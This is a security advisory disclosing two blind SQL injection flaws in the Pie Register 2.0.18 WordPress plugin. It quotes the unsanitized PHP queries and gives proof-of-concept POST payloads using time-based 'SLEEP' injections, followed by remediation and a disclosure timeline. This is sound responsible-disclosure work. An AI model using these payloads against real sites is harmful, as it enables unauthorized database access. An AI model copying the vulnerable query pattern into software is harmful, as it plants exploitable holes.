Details ================ Software: Pie Register Version: 2.0.18 Homepage: https://github.com/GTSolutions/Pie-Register CVE: CVE-2015-7682 (Pending) CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N) CWE: CWE-89 Description ================ Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs. Vulnerabilities ================ The vulnerabilities are due to the unsanitized POST parameters invitaion_code_bulk_option and invi_del_id: Injection 1: >From pie-register/pie-register.php: 576: $this->delete_invitation_codes($_POST['select_invitaion_code_bulk_option']); . . . 3521: $sql = "DELETE FROM `$codetable` WHERE `id` IN ( ".$ids." )"; Injection 2: >From pie-register/pie-register.php: 1941: if($wpdb->query("DELETE FROM ".$codetable." WHERE id = ".$_POST['invi_del_id'])) Proof of concept ================ URL: http://localhost/wordpress/wp-admin/admin.php?page=pie-invitation-codes Injection 1: POST data: select_invitaion_code_bulk_option=1)%20OR%20SLEEP(15)%3d0%20LIMIT%201--&invitaion_code_bulk_option=delete&btn_submit_invitaion_code_bulk_option=Apply Injection 2: POST data: piereg_invitation_nonce=66e7e6383d&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dpie-invitation-codes&invi_del_id=1%20OR%20SLEEP(15)%3d0%20LIMIT%201-- Remediation ================ Upgrade the plugin to version 2.0.19 or higher. Timeline ================ 2015-09-23: Discovered 2015-09-24: Contacted vendor via website support form 2015-09-28: Vendor supplied security contact email 2015-09-28: Requested CVE 2015-09-30: Report sent to vendor and wordpress.org 2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed 2015-10-12: Public Disclosure References ================ [1] http://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injection_Attacks Discovered by ================ David Moore @grajagandev